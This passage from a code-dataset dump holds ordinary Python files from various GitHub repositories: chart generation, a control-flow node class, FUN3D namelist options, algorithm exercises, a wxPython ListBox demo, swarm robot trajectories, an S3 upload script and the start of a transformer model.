\"#2df3ea\",\n \"#209925\",\n \"#0c88e6\",\n \"#02e505\",\n \"#3757d0\",\n \"#fe5346\",\n \"#ba6bc2\",\n \"#283fd0\",\n \"#5f0154\",\n \"#c1b433\",\n \"#e7ae91\",\n \"#fcdf1d\",\n \"#7c6a78\",\n \"#b99efc\",\n \"#13453e\",\n \"#80d79f\",\n \"#e7041d\",\n \"#d6cdc6\",\n \"#2901b3\",\n ]\n\n color_code = {}\n color_count = 0\n for each_comp in data[\"Series Label\"].unique():\n color_code[each_comp] = list_of_colors[color_count]\n color_count += 1\n\n mekko_total = 0\n for value in summary_axis[\"summayAxisLabel\"]:\n b = value[\"name\"].replace(\"$\", \"\")\n b = b.replace(\"b\", \"\")\n mekko_total += int(b)\n response = {\n \"chart\": \"mekko\",\n \"type\": \"plotly\",\n \"input_data\": result,\n \"Data\": {\n \"Labels\": [\n \"Axis\",\n \"chartSize\",\n \"DataLabels\",\n \"MekkoTotal\",\n \"subTitle\",\n \"title\",\n \"rollUp\",\n \"Acquisition\",\n \"CategoryAxisOrientation\",\n \"showPercentage\"\n ],\n \"Axis\": [\"CategoryAxis\", \"SummaryAxis\", \"ValueAxis\"],\n \"MekkoTotal\": {\"Total\": \"Total = ${0}b\".format(mekko_total),\n \"fontColor\": \"black\",\n \"color\": \"\",\n \"fontFamily\": \"\",\n \"fontSize\":12,\n \"bold\": False},\n \"CategoryAxis\": category_axis,\n \"CategoryAxisOrientation\" : categoryaxisorientation,\n \"SummaryAxis\": summary_axis,\n \"ValueAxis\": value_axis,\n \"chartSize\": chart_size,\n \"DataLabels\": {\"dataLabels\": dataLabels},\n \"subTitle\": subtitle,\n \"title\": title,\n \"rollUp\": rollup,\n \"Acquisition\": acquisition,\n \"showPercentage\": showPercentage\n },\n \"Project\": \"\",\n \"Name\": \"\",\n \"Year\": \"\",\n \"Market\": \"\",\n \"Region\": \"\",\n \"Currency\": \"\",\n \"barcolor\": color_code,\n }\n\n # r = json.dumps(response)\n return response","repo_name":"arjunlimat/catalystpoc","sub_path":"chartgeneration/input_request.py","file_name":"input_request.py","file_ext":"py","file_size_in_byte":13169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4954585387","text":"from datetime import timedelta, datetime\nfrom typing import List, Optional, TYPE_CHECKING, Type, Any, TypeVar, Sequence\n\nfrom pycontrolflow.IFlowValueProvider import IFlowValueProvider\nfrom pycontrolflow.flow_value import FlowMemoryCell\nfrom pycontrolflow.string_utils import random_string\nfrom pycontrolflow.types import TNodeInput\n\nif TYPE_CHECKING:\n from pycontrolflow.Flow import Flow\n from pycontrolflow.FlowExecutor import FlowExecutor\n from pycontrolflow.nodes.FlowSingleOutputNode import FlowSingleOutputNode\n\nT = TypeVar(\"T\")\n\n\nclass FlowNode:\n def __init__(self, providers: Sequence[IFlowValueProvider[Any]], nid: Optional[str] = None) -> None:\n self.nid = nid\n self.providers: Sequence[IFlowValueProvider[Any]] = providers\n self.flow_executor: 'FlowExecutor' = None # type: ignore\n\n self.subflows: List['Flow'] = []\n\n def set_executor(self, flow_executor: 'FlowExecutor') -> None:\n self.flow_executor = flow_executor\n for provider in self.providers:\n if isinstance(provider, FlowNode):\n provider.set_executor(flow_executor)\n\n def register_subflow(self, flow: Optional['Flow']) -> None:\n if flow is not None:\n self.subflows.append(flow)\n\n # called after flow executor injected dependencies\n def setup(self) -> None:\n for provider in self.providers:\n self._register_provider(provider)\n\n def reset_state(self) -> None:\n for provider in self.providers:\n if isinstance(provider, FlowNode):\n provider.reset_state()\n\n def process(self, cur_date: datetime, delta: timedelta) -> None:\n for provider in self.providers:\n if isinstance(provider, FlowNode):\n provider.process(cur_date, delta)\n\n def _create_memory(self, name: str, var_type: Type[T], initial_value: T, persistent: bool = False) -> \\\n FlowMemoryCell[T]:\n # noinspection PyProtectedMember\n return self.flow_executor._memory_for_node(self.nid, name, var_type, initial_value, persistent)\n\n def _register_provider(self, provider: TNodeInput[Any]) -> None:\n from pycontrolflow.nodes.FlowSingleOutputNode import FlowSingleOutputNode\n\n if isinstance(provider, FlowSingleOutputNode):\n provider.setup()\n provider.to(self.flow_executor.var(f\"_tmp.{random_string(10)}\", provider.get_type()))\n","repo_name":"KrystianD/pycontrolflow","sub_path":"pycontrolflow/nodes/FlowNode.py","file_name":"FlowNode.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"30948744187","text":"\"\"\"\nThis module provides a class to interpret JSON options that are converted to\nFortran namelist format for FUN3D. The\nmodule provides a class, :class:`pyFun.options.fun3dnml.Fun3DNml`, which\ninterprets the settings of the ``\"Fun3D\"`` section of the master JSON file.\nThese settings are then applied to the main OVERFLOW input file, the\n``fun3d.nml`` namelist.\n\nAn example JSON setting is shown below.\n\n .. code-block:: javascript\n \n \"Fun3D\": {\n \"nonlinear_solver_parameters\": {\n \"schedule_cfl\": [[1.0, 5.0], [5.0, 20.0], [20.0, 20.0]],\n \"time_accuracy\": [\"steady\", \"steady\", \"2ndorder\"],\n \"time_step_nondim\": 2.0,\n \"subiterations\": 5\n },\n \"boundary_output_variables\": {\n \"boundary_list\": \"7-52\",\n \"turres1\": true,\n \"p_tavg\": [false, false, true]\n }\n }\n \nThis will cause the following settings to be applied to ``fun3d.00.nml``.\n\n .. code-block:: none\n \n &nonlinear_solver_parameters\n schedule_cfl = 1.0 5.0\n time_accuracy = 'steady'\n time_step_nondim = 2.0\n subiterations = 5\n /\n &boundary_output_variables\n boundary_list = '7-52'\n turres1 = .true.\n p_tavg = .false.\n /\n \nThe edits to ``fun3d.02.nml`` are from the third entries of each list:\n\n .. code-block:: none\n \n &nonlinear_solver_parameters\n schedule_cfl = 20.0 20.0\n time_accuracy = '2ndorder'\n time_step_nondim = 2.0\n subiterations = 5\n /\n &boundary_output_variables\n boundary_list = '7-52'\n turres1 = .true.\n p_tavg = .true.\n /\n \nEach setting and section in the ``\"Fun3D\"`` section may be either present in\nthe template namelist or missing. It will be either edited or added as\nappropriate, even if the specified section does not exist.\n\n:See also:\n * :mod:`cape.pyfun.namelist`\n * :mod:`cape.pyfun.cntl`\n * :mod:`cape.filecntl.namelist`\n\"\"\"\n\n# Ipmort options-specific utilities\nfrom .util import rc0, odict, getel, setel\n\n# Class for namelist settings\nclass Fun3DNml(odict):\n \"\"\"Dictionary-based interface for FUN3D namelists\"\"\"\n \n # Get the project namelist\n def get_project(self, i=None):\n \"\"\"Return the ``project`` namelist\n \n :Call:\n >>> d = opts.get_project(i=None)\n :Inputs:\n *opts*: :class:`pyFun.options.Options`\n Options interface\n *i*: :class:`int` or ``None``\n Run sequence index\n :Outputs:\n *d*: :class:`pyFun.options.odict`\n Project namelist\n :Versions:\n * 2015-10-18 ``@ddalle``: First version\n \"\"\"\n # Get the value\n d = getel(self.get('project'), i) \n # Check for None\n if d is None:\n # Return empty dict\n return odict()\n else:\n # Convert dictionary to odict\n return odict(**d)\n \n # Get the project namelist\n def get_raw_grid(self, i=None):\n \"\"\"Return the ``raw_grid`` namelist\n \n :Call:\n >>> d = opts.get_raw_grid(i=None)\n :Inputs:\n *opts*: :class:`pyFun.options.Options`\n Options interface\n *i*: :class:`int` or ``None``\n Run sequence index\n :Outputs:\n *d*: :class:`pyFun.options.odict`\n Grid namelist\n :Versions:\n * 2015-10-18 ``@ddalle``: First version\n \"\"\"\n # Get the value\n d = getel(self.get('raw_grid'), i) \n # Check for None\n if d is None:\n # Return empty dict\n return odict()\n else:\n # Convert dictionary to odict\n return odict(**d)\n \n # Get rootname\n def get_project_rootname(self, i=None):\n \"\"\"Return the project root name\n \n :Call:\n >>> rname = opts.get_project_rootname(i=None)\n :Inputs:\n *opts*: :class:`pyFun.options.Options`\n Options interface\n *i*: :class:`int` or ``None``\n Run sequence index\n :Outputs:\n *rname*: :class:`str`\n Project root name\n :Versions:\n * 2015-10-18 ``@ddalle``: First version\n \"\"\"\n # Get the namelist\n d = self.get_project(i)\n # Get the value.\n return d.get_key('project_rootname', i)\n \n # Grid format\n def get_grid_format(self, i=None):\n \"\"\"Return the grid format\n \n :Call:\n >>> fmat = opts.get_grid_format(i=None)\n :Inputs:\n *opts*: :class:`pyFun.options.Options`\n Options interface\n *i*: :class:`int` or ``None``\n Run sequence index\n :Outputs:\n *fmat*: :class:`str`\n Grid format\n :Versions:\n * 2015-10-18 ``@ddalle``: First version\n \"\"\"\n # Get the raw_grid namelist\n d = self.get_raw_grid(i)\n # Get the value.\n return d.get_key('grid_format', i)\n \n \n # Reduce to a single run sequence\n def select_namelist(self, i=0):\n \"\"\"Reduce namelist options to a single instance (i.e. sample lists)\n \n :Call:\n >>> d = opts.select_namelist(i)\n :Inputs:\n *opts*: :class:`pyFun.options.Options`\n Options interface\n *i*: :class:`int` or ``None``\n Run sequence index\n :Outputs:\n *d*: :class:`pyFun.options.odict`\n Project namelist\n :Versions:\n * 2015-10-18 ``@ddalle``: First version\n \"\"\"\n # Initialize output\n d = {}\n # Loop through keys\n for sec in self:\n # Get the list\n L = getel(self[sec], i)\n # Initialize this list.\n d[sec] = {}\n # Loop through subkeys\n for k in L:\n # Select the key and assign it.\n d[sec][k] = getel(L[k], i)\n # Output\n return d\n \n # Get value by name\n def get_namelist_var(self, sec, key, i=None):\n \"\"\"Select a namelist key from a specified section\n \n Roughly, this returns ``opts[sec][key]``.\n \n :Call:\n >>> val = opts.get_namelist_var(sec, key, i=None)\n :Inputs:\n *opts*: :class:`pyFun.options.Options`\n Options interface\n *sec*: :class:`str`\n Section name\n *key*: :class:`str`\n Variable name\n *i*: :class:`int` | ``None``\n Run sequence index\n :Outputs:\n *val*: :class:`int` | :class:`float` | :class:`str` | :class:`list`\n Value from JSON options\n :Versions:\n * 2015-10-19 ``@ddalle``: First version\n \"\"\"\n # Check for namelist\n if sec not in self: return None\n # Select the namelist\n d = getel(self[sec], i)\n # Select the value.\n return getel(d.get(key), i)\n \n # Set value by name\n def set_namelist_var(self, sec, key, val, i=None):\n \"\"\"Set a namelist key for a specified phase or phases\n \n Roughly, this sets ``opts[\"Fun3D\"][sec][key]`` or\n ``opts[\"Fun3D\"][sec][key][i]`` equal to *val*\n \n :Call:\n >>> opts.set_namelist_var(sec, key, val, i=None)\n :Inputs:\n *opts*: :class:`pyFun.options.Options`\n Options interface\n *sec*: :class:`str`\n Section name\n *key*: :class:`str`\n Variable name\n *val*: :class:`int` | :class:`float` | :class:`str` | :class:`list`\n Value from JSON options\n *i*: :class:`int` | ``None``\n Run sequence index\n :Versions:\n * 2017-04-05 ``@ddalle``: First version\n \"\"\"\n # Initialize section\n if sec not in self: self[sec] = {}\n # Initialize key\n if key not in self[sec]: self[sec][key] = None\n # Set value\n self[sec][key] = setel(self[sec][key], i, val)\n \n","repo_name":"nasa/cape","sub_path":"cape/pyfun/options/fun3dnml.py","file_name":"fun3dnml.py","file_ext":"py","file_size_in_byte":8354,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"37"} +{"seq_id":"73394450667","text":"from typing import Optional\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n @staticmethod\n def sum_of_left_leaves(root: Optional[TreeNode]) -> int:\n def inner(root: Optional[TreeNode], is_left: bool) -> int:\n if root is None:\n return 0\n\n _sum = 0\n if root.left is None and root.right is None and is_left:\n _sum = root.val\n\n return (\n _sum + inner(root.left, is_left=True) + inner(root.right, is_left=False)\n )\n\n return inner(root=root, is_left=False)\n\n\nif __name__ == \"__main__\":\n print(Solution().sum_of_left_leaves(root=TreeNode()))\n","repo_name":"ajesh-mishra/python_leetcode","sub_path":"lc_404_sum_of_left_leaves.py","file_name":"lc_404_sum_of_left_leaves.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6189607586","text":"# Queues: A Tale of Two Stacks\n# Cracking the Coding Interview Challenge\n# https://www.hackerrank.com/challenges/ctci-queue-using-two-stacks\n\nclass MyQueue(object):\n def __init__(self):\n self.head = Node(None,None,None)\n self.tail = Node(None,None,None)\n self.head.next = self.tail\n self.tail.previous = self.head\n \n def peek(self):\n return self.head.next.value\n \n def pop(self):\n self.head.next = self.head.next.next\n self.head.next.previous = self.head\n \n def put(self, value):\n newNode = Node(value, self.tail, self.tail.previous)\n newNode.previous.next = newNode\n self.tail.previous = newNode\n \nclass Node(object):\n def __init__(self, value, nextNode, previousNode):\n self.value = value\n self.next = nextNode\n self.previous = previousNode\n \n\n#----------------------- Provided -----------------------\nqueue = MyQueue()\nt = int(input())\nfor line in range(t):\n values = map(int, input().split())\n values = list(values)\n if values[0] == 1:\n queue.put(values[1]) \n elif values[0] == 2:\n queue.pop()\n else:\n print(queue.peek())\n \n","repo_name":"bradymadden97/practice","sub_path":"ctci-queue-using-two-stacks.py","file_name":"ctci-queue-using-two-stacks.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13526157413","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport seaborn as sns\nimport matplotlib as mpl\nfrom multiprocessing import pool, cpu_count\nfrom felpy.analysis.statistics.correlation import norm as normalise\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nfrom os import listdir\nfrom scipy.ndimage import center_of_mass\n\nimport pandas as pd\n\n\ndef get_com(arr):\n \n \"\"\" \n return the center of mass of a 2D array. If the input array is three-dimensional,\n return the slice wise list of center. If four-dimensional, likewise, iterate\n over the third and fourth dimensions.\n \n assumes dimensions [nx, ny, nz, nt] or likewise\n \n :param arr: input array, ie., beam intensity [np array]\n \n :returns centroid: numpy array containing index of beam centroids.\n \"\"\"\n \n if arr.ndim == 2:\n \n ### centroid is a tuple\n centroid = center_of_mass(arr)\n \n elif arr.ndim == 3:\n \n ### centroid shape [nz, 2]\n centroid = [center_of_mass(arr[:,:,i]) for i in range(arr.shape[-1])]\n \n elif arr.ndim == 4:\n \n centroid = np.zeros([arr.shape[-2], 2, arr.shape[-1]])\n \n for itr in range(arr.shape[-1]):\n \n c = [center_of_mass(arr[:,:,i,itr]) for i in range(arr.shape[-2])]\n centroid[:,:,itr] = np.asarray(c)\n centroid = np.asarray(centroid)\n\n return centroid\n\ndef com_to_h5(image, outdir, px = 1, py = 1):\n \"\"\" \n wrapper function to write center-of-mass outputs to a h5 file\n \n :param image: image to be analysed\n :param outdir: directory of h5 file\n :param px: horizontal pixel size (m)\n :paray py: vertical pixel size (m)\n \"\"\"\n \n dict_com_x = {}\n dict_com_y = {}\n\n com = get_com(image)\n\n\n for itr in range(image.shape[-1]):\n\n dict_com_x['Train {}'.format(itr)] = com[:,0,itr]*px\n dict_com_y['Train {}'.format(itr)] = com[:,1,itr]*py\n\n\n df_x = pd.DataFrame.from_dict(dict_com_x)\n df_y = pd.DataFrame.from_dict(dict_com_y)\n\n df_x.to_hdf(outdir, key = \"com_x\")\n df_y.to_hdf(outdir, key = \"com_y\")\n\n\nif __name__ == '__main__':\n \n arr = np.random.rand(100,100, 128, 5)*50\n \n cnt = get_com(arr)\n \n #arg = np.random.rand(arr.shape[-1], arr.shape[-2])\n #plot_centroid(cnt, arg,clabel = \"Energy\")","repo_name":"twguest/FELpy","sub_path":"felpy/analysis/centroid.py","file_name":"centroid.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"43552018112","text":"import requests\nimport boto3\nimport os\n\nbucket_name = os.environ.get('BUCKET_NAME')\ncontent = requests.get('https://data.gharchive.org/2015-01-01-15.json.gz').content\ns3_client = boto3.client('s3')\ns3_client.put_object(\n Body=content,\n Bucket=bucket_name,\n Key='lambdademo/2015-01-01-15.json.gz'\n)\n","repo_name":"kasungayand/awslambdademo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1054744501","text":"#Boa:Frame:Frame1\r\n\r\nimport wx\r\n\r\ndef create(parent):\r\n return Frame1(parent)\r\n\r\n[wxID_FRAME1, wxID_FRAME1BUTTON1, wxID_FRAME1BUTTON2, wxID_FRAME1LIST_KOTA, \r\n wxID_FRAME1PANEL1, wxID_FRAME1STATICTEXT1, wxID_FRAME1STATICTEXT2, \r\n wxID_FRAME1TXT_KOTA, \r\n] = [wx.NewId() for _init_ctrls in range(8)]\r\n\r\nclass Frame1(wx.Frame):\r\n def _init_ctrls(self, prnt):\r\n # generated method, don't edit\r\n wx.Frame.__init__(self, id=wxID_FRAME1, name='', parent=prnt,\r\n pos=wx.Point(461, 269), size=wx.Size(400, 325),\r\n style=wx.DEFAULT_FRAME_STYLE, title='Demo ListBox')\r\n self.SetClientSize(wx.Size(384, 287))\r\n\r\n self.panel1 = wx.Panel(id=wxID_FRAME1PANEL1, name='panel1', parent=self,\r\n pos=wx.Point(0, 0), size=wx.Size(384, 287),\r\n style=wx.TAB_TRAVERSAL)\r\n self.panel1.SetBackgroundColour(wx.Colour(206, 206, 206))\r\n\r\n self.staticText1 = wx.StaticText(id=wxID_FRAME1STATICTEXT1,\r\n label='Daftar Nama Kota', name='staticText1', parent=self.panel1,\r\n pos=wx.Point(24, 32), size=wx.Size(87, 13), style=0)\r\n\r\n self.list_kota = wx.ListBox(choices=['Bandung', 'Medan', 'Solo',\r\n 'Surabaya', 'Jakarta'], id=wxID_FRAME1LIST_KOTA, name='list_kota',\r\n parent=self.panel1, pos=wx.Point(16, 56), size=wx.Size(128, 168),\r\n style=0)\r\n self.list_kota.Bind(wx.EVT_LISTBOX, self.OnList_kotaListbox,\r\n id=wxID_FRAME1LIST_KOTA)\r\n\r\n self.button1 = wx.Button(id=wxID_FRAME1BUTTON1,\r\n label='Bersihkan ListBox', name='button1', parent=self.panel1,\r\n pos=wx.Point(24, 248), size=wx.Size(120, 23), style=0)\r\n self.button1.Bind(wx.EVT_BUTTON, self.OnButton1Button,\r\n id=wxID_FRAME1BUTTON1)\r\n\r\n self.staticText2 = wx.StaticText(id=wxID_FRAME1STATICTEXT2,\r\n label='Kota yang Dipilih', name='staticText2', parent=self.panel1,\r\n pos=wx.Point(184, 88), size=wx.Size(80, 13), style=0)\r\n\r\n self.txt_kota = wx.TextCtrl(id=wxID_FRAME1TXT_KOTA, name='txt_kota',\r\n parent=self.panel1, pos=wx.Point(184, 112), size=wx.Size(128, 21),\r\n style=0, value='')\r\n\r\n self.button2 = wx.Button(id=wxID_FRAME1BUTTON2, label='Isi ListBox',\r\n name='button2', parent=self.panel1, pos=wx.Point(192, 248),\r\n size=wx.Size(128, 23), style=0)\r\n self.button2.Bind(wx.EVT_BUTTON, self.OnButton2Button,\r\n id=wxID_FRAME1BUTTON2)\r\n\r\n def __init__(self, parent):\r\n self._init_ctrls(parent)\r\n\r\n def OnList_kotaListbox(self, event):\r\n self.txt_kota.SetValue\\\r\n (self.list_kota.GetStringSelection())\r\n\r\n def OnButton1Button(self, event):\r\n self.list_kota.Clear()\r\n\r\n def OnButton2Button(self, event):\r\n self.list_kota.Clear()\r\n self.list_kota.Append('Bandung')\r\n self.list_kota.Append('Medan')\r\n self.list_kota.Append('Solo')\r\n self.list_kota.Append('Surabaya')\r\n self.list_kota.Append('Jakarta')\r\n \r\n","repo_name":"ajitirto/belajar-bahasa","sub_path":"Bab VI/Demo ListBox/Frame1.py","file_name":"Frame1.py","file_ext":"py","file_size_in_byte":3079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38591771091","text":"#/usr/bin/env python3\n\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\n\n\n\ndef swarm_relative_test(platforms, idx, running_time): \n # properties\n hold_position = [-0.22,-0.2]\n period = 40\n \n r = 1.5\n \n if idx == 0: # perform absolute motion\n x,y = hold_position\n print(('running time', running_time))\n a = (running_time % period)/period * 2*np.pi\n return x,y,a\n else:\n primairy_platform = platforms[0]\n xt,yt,at = primairy_platform.xpos, primairy_platform.ypos, primairy_platform.attitude\n\n cycle_progress = (running_time%period)/period\n\n # x = -r*np.cos(cycle_progress * 2* np.pi) + xt\n # y = r*np.sin(cycle_progress * 2* np.pi) + yt\n\n x = -r*np.cos(at) + xt\n y = r*np.sin(at) + yt\n\n a = at\n return x, y, a\n # primairy_platform = platforms[0]\n # xt,yt,at = primairy_platform.xpos, primairy_platform.ypos, primairy_platform.attitude\n #\n # x = r*np.cos(at) + xt\n # y = r*np.sin(at) + yt\n # a = (-at)%(2*np.pi)\n # return x,y,a\n\n\ndef swarm_full_test(platforms, idx, running_time):\n # properties\n center_pos = [-0.22,-0.2]\n period = 50\n f1 = 2\n f2 = 3\n\n r1 = 0.5\n r2 = 1.1\n\n if idx == 0: # perform absolute motion\n cycle_progress = ((running_time/period)%1)\n x,y = r1*np.cos(2*np.pi*cycle_progress * f1) + center_pos[0], r1*np.sin(2*np.pi*cycle_progress * f1) + center_pos[1]\n a = 0# -(((running_time*spin_factor)/period)%1) * 2*np.pi\n\n return x,y,a\n\n else:\n primairy_platform = platforms[0]\n xt,yt,at = primairy_platform.xpos, primairy_platform.ypos, primairy_platform.attitude\n\n # x = r2*np.cos(at) + xt\n # y = r2*np.sin(at) + yt\n\n cycle_progress = (running_time % period) / period\n\n x = -r2*np.cos(cycle_progress * 2* np.pi * f2) + xt\n y = r2*np.sin(cycle_progress * 2* np.pi * f2) + yt\n a = 0 #(-at)%(2*np.pi)\n\n return x,y,a\n\n\ndef transform_frame(data, transform=[0,0,0]):\n t_data, x_data, y_data, a_data = data\n dx, dy, da = transform\n \n x_transformed = x_data + dx\n y_transformed = y_data + dy\n a_transform = a_data + da # check if behaving\n \n return t_data, x_transformed, y_transformed, a_transform\n \n \ndef stay_at_position(dt = 0.1):\n time_set = time_set=np.arange(0, 10, dt)\n \n x_pos = np.zeros(len(time_set))\n y_pos = np.zeros(len(time_set))\n a_set = np.zeros(len(time_set))\n \n return [time_set, x_pos, y_pos, a_set], [time_set, x_pos, y_pos, a_set]\n \n \n\n\n\ndef circle_around_point(point_pos, point_vel, time, radius, period, sign=1, initial_time=0, initial_angle=0):\n center_px, center_py = point_pos\n center_vx, center_vy = point_vel\n \n rate = (2*np.pi)/period\n delta_time = (time-initial_time)\n \n # Position calculation\n pos_x = center_px + radius * np.cos(sign*rate*delta_time)\n pos_y = center_py + radius * np.sin(sign*rate*delta_time)\n \n # velocity calculation\n vel_x = center_vx - sign*rate*radius*np.sin(sign*rate * delta_time)\n vel_y = center_vy + sign*rate*radius*np.cos(sign*rate * delta_time)\n \n return pos_x, pos_y, vel_x, vel_y\n \n\ndef swarm_circle(f1=1, f2=1, R1=0.4, R2=0.9, P=30, dt=0.1):\n gcd = np.gcd(f1,f2)\n end_time = gcd*P\n \n time_set=np.arange(0, end_time, dt)\n \n pos1x, pos1y, dir1x, dir1y = circle_around_point([0,0], [0,0], time_set, R1, P/f1, sign=-1)\n pos2x, pos2y, dir2x, dir2y = circle_around_point([pos1x, pos1y], [dir1x, dir1y], time_set, R2, P/f2, sign=-1)\n \n relx, rely = pos1x - pos2x, pos1y - pos2y\n dir2_to_1 = (np.arctan2(relx, rely))\n\n dir_robot_1 = (np.arctan2(-relx, -rely))\n \n set_1 = [time_set, pos1x, pos1y, dir_robot_1]\n set_2 = [time_set, pos2x, pos2y, dir2_to_1]\n \n return set_1, set_2\n\n\ndef calibrate_directions(size = 0.6, seq_time=2, dt=0.1):\n \n seq_dir = [0*np.pi, 0.5*np.pi, 1.0*np.pi, 1.5*np.pi]\n N = len(seq_dir)\n time_set = np.arange(0,2*seq_time*N,dt)\n \n x_pos = np.zeros(len(time_set))\n y_pos = np.zeros(len(time_set))\n a_set = np.zeros(len(time_set))\n \n for i, dir in enumerate(seq_dir):\n seq_start_time = i*2*seq_time\n seq_half_time = i*2*seq_time + seq_time\n seq_end_time = (i+1)*2*seq_time\n \n progress_out = np.linspace(0,1,int(seq_time/dt))\n progress_back = np.linspace(1,0,int(seq_time/dt))\n\n x_pos[int(seq_start_time/dt):int(seq_half_time/dt)] = size * np.cos(dir) * smooth_progress(progress_out)\n y_pos[int(seq_start_time/dt):int(seq_half_time/dt)] = size * np.sin(dir) * smooth_progress(progress_out)\n \n x_pos[int(seq_half_time/dt):int(seq_end_time/dt)] = size * np.cos(dir) * smooth_progress(progress_back)\n y_pos[int(seq_half_time/dt):int(seq_end_time/dt)] = size * np.sin(dir) * smooth_progress(progress_back)\n \n return [time_set, x_pos, y_pos, a_set], [time_set, x_pos, y_pos, a_set]\n \ndef smooth_progress(linear_progress):\n return .5*np.sin(linear_progress*np.pi - np.pi/2) + .5\n\ndef circle_motion(T=6.0, R=0.25, dt=0.1):\n \n time_set = np.arange(0,T,dt)\n x_pos = R*np.cos(sign*time_set * 2*np.pi/T)\n y_pos = R*np.sin(sign*time_set * 2*np.pi/T)\n a_set = np.arange(0, 2*np.pi, 2*np.pi/len(time_set))\n \n return time_set, x_pos, y_pos, a_set\n \n\n\ndef main():\n #calibrate_directions()\n \n x = np.linspace(0,1,50)\n y = smooth_progress(x)\n plt.plot(x,y)\n plt.show()\n \n \n\nif __name__ == \"__main__\":\n main()\n \n \n \n ","repo_name":"lucas-cohen/DSS-ground-testbench","sub_path":"control/default_dynamics.py","file_name":"default_dynamics.py","file_ext":"py","file_size_in_byte":5609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28791100571","text":"# def threeNumberSum(array, targetSum):\n# array.sort()\n# res = []\n \n# for i in range(len(array)):\n# twoSum(array, i, res, targetSum)\n# return res\n\n# def twoSum(array, i, res, targetSum):\n# l, r = i + 1, len(array) - 1\n\n# while l < r:\n# if array[i] + array[l] + array[r] < targetSum:\n# l += 1\n# elif array[i] + array[l] + array[r] > targetSum:\n# r -= 1\n# else:\n# res.append([array[i], array[l], array[r]])\n# l += 1\n# return res\n\n# def threeNumberSum(array, targetSum):\n# foundTriplets = []\n# itemMap = {}\n# array.sort()\n\n# for i in array:\n# itemMap[i] = True\n\n# for i in array:\n# for j in array:\n# if i != j:\n# targetSumDelta = targetSum - (i + j)\n# if targetSum != i and targetSumDelta != j and targetSumDelta in itemMap:\n# hit = [i, j, targetSumDelta]\n# hit.sort()\n# if not hit in foundTriplets:\n# foundTriplets.append(hit)\n\n# return foundTriplets\n\ndef threeNumberSum(array, targetSum):\n lst = []\n for num1 in array:\n for num2 in array[array.index(num1) + 1:]:\n if (targetSum - num1 - num2) in array[array.index(num2) + 1:]:\n lst.append(sorted([num1, num2, targetSum - num1 - num2]))\n return sorted(lst)","repo_name":"rep-pierce/python_files","sub_path":"three_number_sum.py","file_name":"three_number_sum.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28456052902","text":"from .layers.transformer import *\nfrom .layers.improved_transformer import *\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport pdb \n\n\nSAMPLE_PROB = 0.99 \n\n\ndef top_k_top_p_filtering(logits, top_k=0, top_p=0.0, filter_value=-float('Inf')):\n \"\"\" Filter a distribution of logits using top-k and/or nucleus (top-p) filtering\n Args:\n logits: logits distribution shape (vocabulary size)\n top_k >0: keep only top k tokens with highest probability (top-k filtering).\n top_p >0.0: keep the top tokens with cumulative probability >= top_p (nucleus filtering).\n Nucleus filtering is described in Holtzman et al. (http://arxiv.org/abs/1904.09751)\n \"\"\"\n assert logits.dim() == 1 # batch size 1 for now - could be updated for more but the code would be less clear\n top_k = min(top_k, logits.size(-1)) # Safety check\n if top_k > 0:\n # Remove all tokens with a probability less than the last token of the top-k\n indices_to_remove = logits < torch.topk(logits, top_k)[0][..., -1, None]\n logits[indices_to_remove] = filter_value\n\n if top_p > 0.0:\n sorted_logits, sorted_indices = torch.sort(logits, descending=True)\n cumulative_probs = torch.cumsum(F.softmax(sorted_logits, dim=-1), dim=-1)\n\n # Remove tokens with cumulative probability above the threshold\n sorted_indices_to_remove = cumulative_probs > top_p\n # Shift the indices to the right to keep also the first token above the threshold\n sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[..., :-1].clone()\n sorted_indices_to_remove[..., 0] = 0\n\n indices_to_remove = sorted_indices[sorted_indices_to_remove]\n logits[indices_to_remove] = filter_value\n return logits\n\n\nclass Embedder(nn.Module):\n def __init__(self, vocab_size, d_model):\n super().__init__()\n self.embed = nn.Embedding(vocab_size, d_model)\n def forward(self, x):\n return self.embed(x)\n\n\nclass PositionalEncoding(nn.Module):\n\n def __init__(self, d_model, dropout=0.1, max_len=250):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n position = torch.arange(0, max_len, dtype=torch.long).unsqueeze(1)\n self.register_buffer('position', position)\n self.pos_embed = nn.Embedding(max_len, d_model)\n self._init_embeddings()\n\n def _init_embeddings(self):\n nn.init.kaiming_normal_(self.pos_embed.weight, mode=\"fan_in\")\n\n def forward(self, x):\n pos = self.position[:x.size(0)]\n x = x + self.pos_embed(pos)\n return self.dropout(x)\n\n\nclass CodeModel(nn.Module):\n\n def __init__(self,\n config,\n max_len=8,\n classes = 512,\n name='ar_model'):\n super(CodeModel, self).__init__()\n self.embed_dim = config['embed_dim']\n self.max_len = max_len\n self.dropout = config['dropout_rate']\n\n # Position embeddings\n self.pos_embed = PositionalEncoding(max_len=self.max_len, d_model=self.embed_dim)\n \n 